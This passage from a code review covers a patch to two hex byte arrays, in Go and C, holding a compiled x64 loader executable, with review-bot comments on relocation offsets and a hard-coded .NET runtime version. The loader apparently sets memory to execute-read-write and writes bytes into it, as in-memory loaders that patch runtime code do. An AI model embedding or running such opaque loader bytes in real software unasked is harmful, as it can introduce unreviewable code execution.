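/ 66 c7 45 13 33 31 / c6 45 15 39, i.e. '4','3','3','1','9' at offsets 1, 5, 7, 8 and 9, which with the untouched 'v', '.', '0', '.', '0' positions spells "v4.0.30319"; the slot-0x18 call is made, and on a non-negative result 79 4b jumps straight to the success path. On failure the digits are rewritten to '2','5','7','2','7' ("v2.0.50727"), the conversion and the call are repeated, and only the second result is checked with 78 3c. Two points follow. First, whatever runtime string the caller placed at [rbp+0xc] is no longer honoured; it is partially overwritten in the caller's own structure, so after this function returns the caller's copy has been mutated as well. If a user-selectable runtime version is meant to survive, that option is now dead. Second, the patch assumes the buffer already holds a string shaped like "vX.0.XXXXX": offsets 0, 2, 3, 4 and 6 are never written, so an empty or differently shaped buffer yields a garbage version string (an empty buffer becomes a NUL-terminated empty string and the '4' is never seen). Either write the full ten bytes plus terminator or keep honouring the supplied string and only fall back to the two hard-coded versions when it is empty. Also note that the added code is exactly 96 bytes (eight new lines of twelve), which is the 0x60 seen in every rel32 fixup elsewhere in the file, so no second code change is hiding among the relocations.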
@ -462,15 +470,15 @@ var LOADER_EXE_X64 = []byte{
0x48, 0x85, 0xc0, 0x75, 0x0d, 0x48, 0x39, 0x87, 0xa0, 0x01, 0x00, 0x00,
0x0f, 0x85, 0xb9, 0x01, 0x00, 0x00, 0xff, 0xc6, 0x3b, 0xb7, 0x3c, 0x02,
0x00, 0x00, 0x72, 0xcd, 0x8b, 0x87, 0x20, 0x09, 0x00, 0x00, 0x83, 0xf8,
0x02, 0x75, 0x1f, 0x48, 0x8b, 0xcf, 0xe8, 0x5d, 0xef, 0xff, 0xff, 0x41,
0x02, 0x75, 0x1f, 0x48, 0x8b, 0xcf, 0xe8, 0xfd, 0xee, 0xff, 0xff, 0x41,
0xbe, 0x01, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x94, 0x01, 0x00,
0x00, 0x48, 0x8b, 0x9f, 0x60, 0x0d, 0x00, 0x00, 0xeb, 0x23, 0x41, 0xbe,
0x01, 0x00, 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0x7c, 0x01, 0x00,
0x00, 0x48, 0x8d, 0x9f, 0x60, 0x0d, 0x00, 0x00, 0x41, 0x3b, 0xc6, 0x74,
0x08, 0x48, 0x8b, 0x9c, 0x24, 0xb0, 0x01, 0x00, 0x00, 0x44, 0x39, 0xb7,
0x70, 0x05, 0x00, 0x00, 0x74, 0x32, 0x48, 0x8b, 0xcf, 0xe8, 0x56, 0xed,
0x70, 0x05, 0x00, 0x00, 0x74, 0x32, 0x48, 0x8b, 0xcf, 0xe8, 0xf6, 0xec,
0xff, 0xff, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbf, 0x70, 0x05, 0x00, 0x00,
0x02, 0x0f, 0x84, 0x46, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xe8, 0x69,
0x02, 0x0f, 0x84, 0x46, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xe8, 0x09,
0xee, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbf, 0x70, 0x05, 0x00,
0x00, 0x02, 0x0f, 0x84, 0x2d, 0x01, 0x00, 0x00, 0x44, 0x39, 0x73, 0x08,
0x0f, 0x84, 0xad, 0x00, 0x00, 0x00, 0x8b, 0x93, 0x24, 0x05, 0x00, 0x00,
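Review bot: the three backward e8 calls here shrink by 0x60 (0xffffef5d to 0xffffeefd, 0xffffed56 to 0xffffecf6, 0xffffee69 to 0xffffee09), the mirror image of the forward calls growing by 0x60 above, which confirms that the inserted 0x60 bytes sit between these call sites and their targets. No other byte in the hunk changes; relocation only.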
@ -492,9 +500,9 @@ var LOADER_EXE_X64 = []byte{
0x41, 0x3b, 0xc6, 0x76, 0x15, 0x8d, 0x41, 0xfb, 0x41, 0x3b, 0xc6, 0x77,
0x4b, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xcf, 0xe8, 0xa8, 0x0f, 0x00, 0x00,
0xeb, 0x3e, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0x48, 0x8b, 0xd3, 0x48, 0x8b,
0xcf, 0xe8, 0x62, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x10, 0x4c, 0x8d,
0xcf, 0xe8, 0x02, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x10, 0x4c, 0x8d,
0x44, 0x24, 0x30, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xcf, 0xe8, 0x9e, 0x00,
0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0xcf, 0xe8, 0xd1,
0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0xcf, 0xe8, 0x71,
0xf4, 0xff, 0xff, 0xeb, 0x0b, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xcf, 0xe8,
0xb4, 0x04, 0x00, 0x00, 0x83, 0xbf, 0x30, 0x02, 0x00, 0x00, 0x03, 0x75,
0x08, 0xeb, 0xfe, 0x41, 0xbe, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x87, 0x20,
@ -690,7 +698,7 @@ var LOADER_EXE_X64 = []byte{
0x10, 0x49, 0x03, 0xf8, 0x4d, 0x03, 0xf8, 0x48, 0x8b, 0x0f, 0x33, 0xc0,
0x48, 0x85, 0xc9, 0x74, 0x55, 0x79, 0x08, 0x44, 0x8b, 0xc9, 0x45, 0x33,
0xc0, 0xeb, 0x2c, 0x4e, 0x8d, 0x24, 0x01, 0x41, 0x39, 0x46, 0x04, 0x74,
0x1a, 0x49, 0x8d, 0x54, 0x24, 0x02, 0x48, 0x8b, 0xce, 0xe8, 0x32, 0xf0,
0x1a, 0x49, 0x8d, 0x54, 0x24, 0x02, 0x48, 0x8b, 0xce, 0xe8, 0xd2, 0xef,
0xff, 0xff, 0x85, 0xc0, 0x74, 0x09, 0x48, 0x8b, 0x86, 0xe0, 0x01, 0x00,
0x00, 0xeb, 0x13, 0x45, 0x33, 0xc9, 0x4d, 0x8d, 0x44, 0x24, 0x02, 0x49,
0x8b, 0xd5, 0x48, 0x8b, 0xce, 0xe8, 0x66, 0x0c, 0x00, 0x00, 0x49, 0x89,
@ -836,24 +844,24 @@ var LOADER_EXE_X64 = []byte{
0x4c, 0x24, 0x28, 0x44, 0x8b, 0xcb, 0x33, 0xc9, 0x48, 0x89, 0x44, 0x24,
0x20, 0x33, 0xd2, 0xff, 0x56, 0x70, 0x83, 0x65, 0xe8, 0x00, 0x48, 0x8d,
0x45, 0x80, 0x83, 0x65, 0xf8, 0x00, 0x48, 0x8d, 0x55, 0x08, 0x48, 0x89,
0x45, 0xe0, 0x48, 0x8b, 0xce, 0x48, 0x8d, 0x05, 0x74, 0xdb, 0xff, 0xff,
0x48, 0x89, 0x75, 0x38, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x05, 0xf9,
0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0x88, 0x48, 0x8d, 0x05, 0x56, 0xda,
0xff, 0xff, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x05, 0xd3, 0xda, 0xff,
0xff, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8d, 0x05, 0x50, 0xda, 0xff, 0xff,
0x48, 0x89, 0x45, 0xa0, 0x48, 0x8d, 0x05, 0x41, 0xda, 0xff, 0xff, 0x48,
0x89, 0x45, 0xa8, 0x48, 0x8d, 0x05, 0x36, 0xda, 0xff, 0xff, 0x48, 0x89,
0x45, 0xb0, 0x48, 0x8d, 0x05, 0x2b, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45,
0xb8, 0x48, 0x8d, 0x05, 0xb8, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc0,
0x48, 0x8d, 0x05, 0x15, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48,
0x8d, 0x05, 0x0a, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8d,
0x44, 0x24, 0x50, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8d, 0x05, 0x92, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8d, 0x05, 0x76, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x05, 0xd2, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x60, 0x48, 0x8d, 0x05, 0x66, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x68, 0x48, 0x8d, 0x05, 0x5a, 0xd9,
0x45, 0xe0, 0x48, 0x8b, 0xce, 0x48, 0x8d, 0x05, 0x14, 0xdb, 0xff, 0xff,
0x48, 0x89, 0x75, 0x38, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x05, 0x99,
0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0x88, 0x48, 0x8d, 0x05, 0xf6, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x05, 0x73, 0xda, 0xff,
0xff, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8d, 0x05, 0xf0, 0xd9, 0xff, 0xff,
0x48, 0x89, 0x45, 0xa0, 0x48, 0x8d, 0x05, 0xe1, 0xd9, 0xff, 0xff, 0x48,
0x89, 0x45, 0xa8, 0x48, 0x8d, 0x05, 0xd6, 0xd9, 0xff, 0xff, 0x48, 0x89,
0x45, 0xb0, 0x48, 0x8d, 0x05, 0xcb, 0xd9, 0xff, 0xff, 0x48, 0x89, 0x45,
0xb8, 0x48, 0x8d, 0x05, 0x58, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc0,
0x48, 0x8d, 0x05, 0xb5, 0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48,
0x8d, 0x05, 0xaa, 0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8d,
0x44, 0x24, 0x50, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8d, 0x05, 0x32, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8d, 0x05, 0x16, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x05, 0x72, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x60, 0x48, 0x8d, 0x05, 0x06, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x68, 0x48, 0x8d, 0x05, 0xfa, 0xd8,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x70, 0x48, 0x8d, 0x45, 0x40, 0x48,
0x89, 0x45, 0x08, 0x48, 0x89, 0x75, 0x00, 0xe8, 0x90, 0xe5, 0xff, 0xff,
0x89, 0x45, 0x08, 0x48, 0x89, 0x75, 0x00, 0xe8, 0x30, 0xe5, 0xff, 0xff,
0x33, 0xd2, 0x33, 0xc9, 0xff, 0x96, 0xa8, 0x01, 0x00, 0x00, 0x85, 0xc0,
0x0f, 0x85, 0x4c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x60, 0x03, 0x00,
0x00, 0x33, 0xd2, 0x4c, 0x8d, 0x8e, 0xd0, 0x08, 0x00, 0x00, 0x48, 0x89,
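Review bot: all sixteen 48 8d 05 lea rax,[rip+disp32] entries and the e8 call at the end move by exactly -0x60 (0xffffdb74 to 0xffffdb14, 0xd9f9 to 0xd999, ..., 0xd95a to 0xd8fa, 0xffffe590 to 0xffffe530). These are rip-relative code addresses being stored into a table on the stack, and the fact that every one of them shifts by the full 0x60 shows none of them points into the inserted region, which is what you want: the new bytes are reached only through the existing control flow of the function they were added to. Nothing else in the hunk changes.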
@ -927,12 +935,12 @@ var LOADER_EXE_X64 = []byte{
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x82, 0x45, 0x85, 0xff, 0x74,
0x38, 0x85, 0xed, 0x74, 0x14, 0xff, 0xd3, 0x48, 0x8b, 0xd8, 0x41, 0xb9,
0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x65, 0xff, 0xff,
0xff, 0x48, 0x8b, 0x13, 0x48, 0x8b, 0xce, 0xe8, 0xa4, 0xe5, 0xff, 0xff,
0xff, 0x48, 0x8b, 0x13, 0x48, 0x8b, 0xce, 0xe8, 0x44, 0xe5, 0xff, 0xff,
0x41, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x4c, 0xff,
0xff, 0xff, 0x48, 0x8b, 0x44, 0x24, 0x28, 0xeb, 0x35, 0x85, 0xed, 0x74,
0x14, 0xff, 0xd3, 0x48, 0x8b, 0xd8, 0x41, 0xb9, 0x01, 0x00, 0x00, 0x00,
0x48, 0x85, 0xc0, 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x13,
0x48, 0x8b, 0xce, 0xe8, 0x6c, 0xe5, 0xff, 0xff, 0x41, 0xb9, 0x01, 0x00,
0x48, 0x8b, 0xce, 0xe8, 0x0c, 0xe5, 0xff, 0xff, 0x41, 0xb9, 0x01, 0x00,
0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x14, 0xff, 0xff, 0xff, 0x49, 0x8b,
0x46, 0x08, 0x48, 0x89, 0x03, 0xe9, 0x08, 0xff, 0xff, 0xff, 0x48, 0x8b,
0x3f, 0x48, 0x83, 0x7f, 0x30, 0x00, 0x0f, 0x85, 0xf3, 0xfe, 0xff, 0xff,
@ -988,7 +996,7 @@ var LOADER_EXE_X64 = []byte{
0x73, 0x12, 0x8b, 0xca, 0xff, 0xc2, 0x42, 0x8a, 0x04, 0x01, 0x88, 0x44,
0x0c, 0x60, 0x46, 0x38, 0x1c, 0x02, 0x75, 0xe9, 0x8b, 0xc2, 0x4c, 0x8d,
0x4c, 0x24, 0x60, 0x4c, 0x8d, 0x44, 0x24, 0x20, 0x48, 0x8b, 0xd7, 0x49,
0x8b, 0xca, 0x44, 0x88, 0x5c, 0x04, 0x60, 0xe8, 0xfc, 0xdc, 0xff, 0xff,
0x8b, 0xca, 0x44, 0x88, 0x5c, 0x04, 0x60, 0xe8, 0x9c, 0xdc, 0xff, 0xff,
0x48, 0x8b, 0xd8, 0x48, 0x8b, 0xc3, 0xeb, 0x12, 0x44, 0x2b, 0x4e, 0x10,
0x43, 0x8b, 0x1c, 0x8e, 0x48, 0x03, 0xdf, 0xe9, 0x40, 0xff, 0xff, 0xff,
0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x81,
@ -999,7 +1007,7 @@ var LOADER_EXE_X64 = []byte{
0x00, 0x49, 0x8b, 0xf8, 0x48, 0x8b, 0xf2, 0x48, 0x8b, 0xe9, 0x45, 0x33,
0xd2, 0x4c, 0x8b, 0x48, 0x60, 0x49, 0x8b, 0x41, 0x18, 0x48, 0x8b, 0x58,
0x10, 0xeb, 0x1c, 0x4d, 0x85, 0xd2, 0x75, 0x20, 0x4c, 0x8b, 0xcf, 0x4c,
0x8b, 0xc6, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcd, 0xe8, 0xbf, 0xda, 0xff,
0x8b, 0xc6, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcd, 0xe8, 0x5f, 0xda, 0xff,
0xff, 0x48, 0x8b, 0x1b, 0x4c, 0x8b, 0xd0, 0x48, 0x8b, 0x43, 0x30, 0x48,
0x85, 0xc0, 0x75, 0xdb, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x49, 0x8b, 0xc2,
0x48, 0x8b, 0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74, 0x24, 0x40, 0x48, 0x83,
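Review bot: the Go byte slice here and the C header that follows carry identical hunks, which is correct but also means two hand-maintained copies of one compiled artefact in the tree. Generate both from a single build step (the header from the compiler output, the Go file from the header) and add a check that the two arrays are byte-for-byte equal so they cannot drift, and put a comment above each array naming the source revision and build flags it was produced from, since the hex itself cannot be reviewed.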


@ -4,24 +4,24 @@ unsigned char LOADER_EXE_X64[] = {
0x74, 0x24, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec, 0x00,
0x05, 0x00, 0x00, 0x33, 0xff, 0x48, 0x8b, 0xd9, 0x39, 0xb9, 0x38, 0x02,
0x00, 0x00, 0x0f, 0x84, 0xce, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x41, 0x28,
0x48, 0x8b, 0x91, 0x88, 0x00, 0x00, 0x00, 0xe8, 0x34, 0x2e, 0x00, 0x00,
0x48, 0x8b, 0x91, 0x88, 0x00, 0x00, 0x00, 0xe8, 0x94, 0x2e, 0x00, 0x00,
0x48, 0x85, 0xc0, 0x0f, 0x84, 0xaf, 0x00, 0x00, 0x00, 0x48, 0x21, 0x7c,
0x24, 0x28, 0x4c, 0x8d, 0x05, 0x77, 0x13, 0x00, 0x00, 0x21, 0x7c, 0x24,
0x24, 0x28, 0x4c, 0x8d, 0x05, 0xd7, 0x13, 0x00, 0x00, 0x21, 0x7c, 0x24,
0x20, 0x4c, 0x8b, 0xcb, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0xd0, 0x4c, 0x8b,
0x43, 0x28, 0x48, 0x8b, 0xcb, 0x48, 0x8b, 0x93, 0x08, 0x02, 0x00, 0x00,
0x48, 0x8b, 0xf8, 0xe8, 0xfc, 0x2d, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28,
0x48, 0x8b, 0xf8, 0xe8, 0x5c, 0x2e, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28,
0x48, 0x8b, 0xcb, 0x48, 0x8b, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x4c, 0x8b,
0xf0, 0xe8, 0xe6, 0x2d, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b,
0xf0, 0xe8, 0x46, 0x2e, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b,
0xcb, 0x48, 0x8b, 0x93, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0xe8,
0xd0, 0x2d, 0x00, 0x00, 0x33, 0xc9, 0x48, 0x8b, 0xe8, 0xff, 0x53, 0x40,
0x30, 0x2e, 0x00, 0x00, 0x33, 0xc9, 0x48, 0x8b, 0xe8, 0xff, 0x53, 0x40,
0x4c, 0x8b, 0xf8, 0x4d, 0x85, 0xf6, 0x74, 0x4f, 0x48, 0x85, 0xf6, 0x74,
0x4a, 0x48, 0x85, 0xed, 0x74, 0x45, 0xc7, 0x44, 0x24, 0x60, 0x0b, 0x00,
0x10, 0x00, 0xff, 0xd5, 0x48, 0x8b, 0xc8, 0x48, 0x8d, 0x54, 0x24, 0x30,
0xff, 0xd6, 0x8b, 0x83, 0x38, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x4c, 0x24,
0x30, 0x48, 0x83, 0xa4, 0x24, 0xc8, 0x00, 0x00, 0x00, 0xf0, 0x49, 0x03,
0xc7, 0x33, 0xd2, 0x48, 0x89, 0x84, 0x24, 0x28, 0x01, 0x00, 0x00, 0x41,
0xff, 0xd6, 0xeb, 0x0b, 0x48, 0x83, 0xc8, 0xff, 0xeb, 0x08, 0xe8, 0xc9,
0x12, 0x00, 0x00, 0x48, 0x8b, 0xc7, 0x4c, 0x8d, 0x9c, 0x24, 0x00, 0x05,
0xff, 0xd6, 0xeb, 0x0b, 0x48, 0x83, 0xc8, 0xff, 0xeb, 0x08, 0xe8, 0x29,
0x13, 0x00, 0x00, 0x48, 0x8b, 0xc7, 0x4c, 0x8d, 0x9c, 0x24, 0x00, 0x05,
0x00, 0x00, 0x49, 0x8b, 0x5b, 0x20, 0x49, 0x8b, 0x6b, 0x28, 0x49, 0x8b,
0x73, 0x30, 0x49, 0x8b, 0xe3, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0xc3, 0xcc,
0xf0, 0xff, 0x41, 0x08, 0x8b, 0x41, 0x08, 0xc3, 0xb8, 0x01, 0x40, 0x00,
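Review bot: besides the usual +0x60 call fixups (0x2e34 to 0x2e94, 0x2dfc to 0x2e5c, 0x2de6 to 0x2e46, 0x2dd0 to 0x2e30, 0x12c9 to 0x1329) this hunk also moves the 4c 8d 05 lea r8,[rip+disp32] from 0x1377 to 0x13d7. That is a code pointer loaded into r8 and handed to the indirect ff d0 call that follows rather than a call target, so it is worth confirming in the source that the routine it refers to is the one intended, because a stale function pointer would not be caught by the same sanity check that catches a wrong call displacement. Otherwise the hunk is relocation only and matches the Go copy above.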
@ -49,7 +49,7 @@ unsigned char LOADER_EXE_X64[] = {
0x5b, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x53, 0x48, 0x83, 0xec, 0x60,
0x83, 0x60, 0x20, 0x00, 0x48, 0x8d, 0x48, 0xb8, 0x83, 0x60, 0x18, 0x00,
0x48, 0x8b, 0xda, 0x83, 0x60, 0x10, 0x00, 0x33, 0xd2, 0x44, 0x8d, 0x42,
0x40, 0xe8, 0xbe, 0x31, 0x00, 0x00, 0x48, 0x8b, 0x03, 0x48, 0x8d, 0x54,
0x40, 0xe8, 0x1e, 0x32, 0x00, 0x00, 0x48, 0x8b, 0x03, 0x48, 0x8d, 0x54,
0x24, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x75, 0x1e,
0x48, 0x8b, 0x03, 0x4c, 0x8d, 0x4c, 0x24, 0x78, 0x4c, 0x8d, 0x84, 0x24,
0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0x48, 0x8d, 0x94, 0x24, 0x88,
@ -70,38 +70,38 @@ unsigned char LOADER_EXE_X64[] = {
0x28, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc3, 0xcc, 0x8d, 0x04, 0x11, 0xc3,
0x48, 0x89, 0x5c, 0x24, 0x18, 0x55, 0x56, 0x57, 0x41, 0x56, 0x41, 0x57,
0x48, 0x83, 0xec, 0x20, 0x48, 0x8d, 0x91, 0x54, 0x03, 0x00, 0x00, 0x48,
0x8b, 0xd9, 0xe8, 0x91, 0x28, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85,
0x8b, 0xd9, 0xe8, 0xf1, 0x28, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85,
0xc0, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xe7, 0x00, 0x00,
0x00, 0x4c, 0x8d, 0x83, 0xc8, 0x05, 0x00, 0x00, 0x45, 0x33, 0xc9, 0x48,
0x8b, 0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0x52, 0x29, 0x00, 0x00, 0x48, 0x8b,
0x8b, 0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0xb2, 0x29, 0x00, 0x00, 0x48, 0x8b,
0xe8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xc4, 0x00, 0x00, 0x00, 0x48, 0x8d,
0x3d, 0x8f, 0xff, 0xff, 0xff, 0x4c, 0x8d, 0x3d, 0x7c, 0xff, 0xff, 0xff,
0x41, 0x2b, 0xff, 0x0f, 0x88, 0xad, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c,
0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x44, 0x8b,
0xf7, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x0f, 0x84, 0x8f,
0x00, 0x00, 0x00, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xcd,
0xe8, 0x2b, 0x30, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d,
0xe8, 0x8b, 0x30, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d,
0x4c, 0x24, 0x58, 0x41, 0x8b, 0xd6, 0x48, 0x8b, 0xcd, 0xff, 0x53, 0x60,
0x4c, 0x8d, 0x83, 0xd8, 0x05, 0x00, 0x00, 0x45, 0x33, 0xc9, 0x48, 0x8b,
0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0xdb, 0x28, 0x00, 0x00, 0x48, 0x8b, 0xf0,
0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0x3b, 0x29, 0x00, 0x00, 0x48, 0x8b, 0xf0,
0x48, 0x85, 0xc0, 0x74, 0x51, 0x48, 0x8d, 0x3d, 0x30, 0xff, 0xff, 0xff,
0x4c, 0x8d, 0x35, 0x1d, 0xff, 0xff, 0xff, 0x41, 0x2b, 0xfe, 0x78, 0x3e,
0x4c, 0x8d, 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00,
0x00, 0x8b, 0xef, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x74,
0x25, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce, 0xe8, 0xc1,
0x2f, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24,
0x25, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce, 0xe8, 0x21,
0x30, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24,
0x58, 0x8b, 0xd5, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x60, 0xe9, 0x11, 0xff,
0xff, 0xff, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x83, 0xc4,
0x20, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0x5e, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc,
0x48, 0x89, 0x5c, 0x24, 0x18, 0x48, 0x89, 0x74, 0x24, 0x20, 0x57, 0x48,
0x83, 0xec, 0x20, 0x48, 0x8d, 0x91, 0x68, 0x03, 0x00, 0x00, 0x48, 0x8b,
0xd9, 0xe8, 0x66, 0x27, 0x00, 0x00, 0x4c, 0x8d, 0x83, 0xe8, 0x05, 0x00,
0x00, 0x45, 0x33, 0xc9, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcb, 0xe8, 0x39,
0xd9, 0xe8, 0xc6, 0x27, 0x00, 0x00, 0x4c, 0x8d, 0x83, 0xe8, 0x05, 0x00,
0x00, 0x45, 0x33, 0xc9, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcb, 0xe8, 0x99,
0x28, 0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x74, 0x42, 0xbe,
0x01, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x30, 0x8b, 0xd6, 0x48,
0x8b, 0xc8, 0x44, 0x8d, 0x46, 0x3f, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x74,
0x28, 0x48, 0x8d, 0x93, 0x0c, 0x06, 0x00, 0x00, 0x44, 0x8b, 0xc6, 0x48,
0x8b, 0xcf, 0xe8, 0x2d, 0x2f, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x30,
0x8b, 0xcf, 0xe8, 0x8d, 0x2f, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x30,
0x4c, 0x8d, 0x4c, 0x24, 0x38, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xff, 0x53,
0x60, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x40,
0x48, 0x8b, 0x74, 0x24, 0x48, 0x48, 0x83, 0xc4, 0x20, 0x5f, 0xc3, 0xcc,
@ -110,7 +110,7 @@ unsigned char LOADER_EXE_X64[] = {
0x78, 0x03, 0x00, 0x00, 0x45, 0x33, 0xff, 0x48, 0x8b, 0xf9, 0x44, 0x21,
0xbd, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x4c, 0x24, 0x60, 0x33, 0xd2,
0x33, 0xf6, 0xbb, 0x00, 0x03, 0x60, 0x04, 0x45, 0x8d, 0x77, 0x68, 0x45,
0x8b, 0xc6, 0xe8, 0xe1, 0x2e, 0x00, 0x00, 0xb9, 0x04, 0x01, 0x00, 0x00,
0x8b, 0xc6, 0xe8, 0x41, 0x2f, 0x00, 0x00, 0xb9, 0x04, 0x01, 0x00, 0x00,
0x44, 0x89, 0x74, 0x24, 0x60, 0x89, 0x4d, 0x80, 0x48, 0x8d, 0x85, 0x60,
0x01, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x78, 0x4c, 0x8d, 0x4c, 0x24,
0x60, 0x89, 0x4d, 0xb0, 0x48, 0x8d, 0x45, 0x50, 0x48, 0x89, 0x45, 0xa8,
@ -186,9 +186,9 @@ unsigned char LOADER_EXE_X64[] = {
0xc0, 0x74, 0x5a, 0x33, 0xc9, 0x8b, 0xd0, 0x41, 0xb8, 0x00, 0x30, 0x00,
0x00, 0x44, 0x8d, 0x49, 0x04, 0xff, 0x57, 0x48, 0x48, 0x89, 0x87, 0x60,
0x0d, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x17, 0x44, 0x8b, 0x85, 0xc0,
0x02, 0x00, 0x00, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xe8, 0x2a, 0x2b,
